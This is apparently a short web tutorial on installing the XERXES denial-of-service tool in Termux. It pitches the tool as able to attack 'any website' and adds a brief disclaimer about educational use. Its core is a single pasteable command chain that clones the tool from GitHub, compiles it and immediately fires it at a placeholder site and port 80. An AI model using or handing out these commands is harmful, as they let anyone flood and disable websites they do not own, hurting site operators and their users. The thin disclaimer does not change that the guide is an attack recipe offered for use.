Guide For Install XERXES Tool In Termux
XERXES is tool for perform ddos attack on any website. With the help of this tool you can analysis ddos vulnerability on your websites.
It is a Open source tool available on github. DDOS attack can be performed by using this tool. it is written in C language.
The tool is very useful for security testing.
This tool is only for educational & vulnerability analysis purposes. Perform ddos without prior or mutual consent is illegal, we aren't responsible for any of your activity.
Installation Commands
Paste in Termux
pkg update -y&& pkg upgrade -y&& pkg install git -y&& pkg install clang -y&& git clone https://github.com /XCHADXFAQ77X/XERXES&& cd XERXES&& chmod +x *&& clang xerxes.c -o xerxes&& ./xerxes www.site.com 80&&
Here : www.site.com = site address
Here : 80 = Port Number